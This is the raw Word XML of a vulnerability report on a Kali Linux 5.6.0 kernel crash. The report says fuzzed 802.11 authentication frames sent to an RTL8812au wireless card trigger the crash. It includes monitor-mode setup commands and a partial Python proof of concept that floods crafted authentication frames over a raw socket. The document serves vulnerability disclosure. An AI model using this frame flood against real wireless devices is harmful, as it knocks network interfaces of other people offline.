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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">The Fuzz </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>results in the Kali kernel Crash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on the internal Fuzz test platform Zsniffer, compile the WIFI Authentication status model, and perform Fuzz test on its field variation, which causes the kernel Crash and the NIC down to drop. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Affected Version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kali kernel version: 5.6.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Environment Building</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1) Environment Information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Operating system: Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kernel version: Linux kali 5.6.0-kali2-amd64 #1 SMP Debian 5.6.14-1kali1 (2020-05-25) x86_64 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wireless NIC chip type: RTL8812au</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python version: 2.7.18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2) Environment Building</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Use a router based on the Qualcomm X55 platform to start the router. Connect the kali system as a client to the wireless NIC. The following shows the NIC Wlan0:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3804920"/>
            <wp:effectExtent l="0" t="0" r="4445" b="508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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="3804920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulnerability Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1) Enables the monitoring mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip link set wlan0 down</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iw dev wlan0 set type monitor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip link set wlan0 up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>The parameters are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2967355"/>
            <wp:effectExtent l="0" t="0" r="5080" b="444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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271770" cy="2967355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2) Some POC contents are as follows:</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AP_MAC = "00:22:66:88:22:00"</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STA_MAC = "00:13:ef:f1:04:ef"</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ETH_P_ALL = 3</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IFACE = "wlan0"</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def mac2str(mac):</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 xml:space="preserve">    return "".join(map(lambda x: chr(int(x, 16)), mac.split(":")))</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RADIO = "\x00"</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RADIO += "\x00"</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RADIO += "\x24\x00"</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RADIO += "\x2f\x40\x00\xa0"</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RADIO += "\x20\x08\x00\x00"</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RADIO += "\x00\x00\x00\x00"</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RADIO += "\x27"</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RADIO += "\x43"</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RADIO += "\x6e\x25"</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RADIO += "\xa0\x00"</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RADIO += "\x00\x00"</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RADIO += "\x10\x02"</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RADIO += "\x6c\x09"</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RADIO += "\xa0\x00"</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RADIO += "\xd0\x00"</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RADIO += "\x00"</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RADIO += "\x00"</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RADIO += "\xd0"</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RADIO += "\x00"</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AUTH_REQ_OPEN = RADIO + "\xB0"  # Type/Subtype</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AUTH_REQ_OPEN += "\x08"  # Flags</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AUTH_REQ_OPEN += "\xc3\x50"  # Duration ID</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AUTH_REQ_OPEN += mac2str(AP_MAC)  # Desti8nation address</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AUTH_REQ_OPEN += mac2str(STA_MAC)  # Source address</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AUTH_REQ_OPEN += mac2str(AP_MAC)  # BSSID</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AUTH_REQ_OPEN += "\x00\x00"  # Sequence control</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AUTH_REQ_OPEN += "\x00\x00"  # Authentication algorithm (open)</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AUTH_REQ_OPEN += "\x01\x00"  # Authentication sequence number</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AUTH_REQ_OPEN += "\x00\x00"  # Authentication status</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AUTH_REQ_OPEN += "\x1f\xd8"  # Authentication status</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AUTH_REQ_OPEN += "\x5a\x07"  # Authentication status</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AUTH_REQ_HDR = AUTH_REQ_OPEN[:-6]</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def start_fuzz():</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s  = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))</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s. Bind((IFACE, ETH_P_ALL))</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 xml:space="preserve">    while True:</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s. Send(AUTH_REQ_OPEN)</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r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("send msg",AUTH_REQ_OPEN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="480" w:lineRule="exact"/>
        <w:ind w:left="363" w:firstLine="0"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reproduction Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">After using the wireless NIC of the chip type RTL8812au for the test, we find that the NIC is down. After the test on the status of 802.11 protocol authentication not establishing connection, it is found that the wireless NIC is down. According to a preliminary analysis, this problem is caused by the kernel Crash. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>The following figure shows the fault.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4133215" cy="1428750"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="3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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4133215" cy="14287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adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">At the same time, Wireshark cannot continue to capture packets because the NIC is down. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3224530"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13970"/>
            <wp:docPr id="3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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="322453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adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="9"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">By viewing the information of the kernel invocation link, the following error logs are reported. According to the analysis, it is the kernel Crash that causes the NIC to be down. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="2251710"/>
            <wp:effectExtent l="0" t="0" r="13335" b="15240"/>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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5263515" cy="2251710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Attachments:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
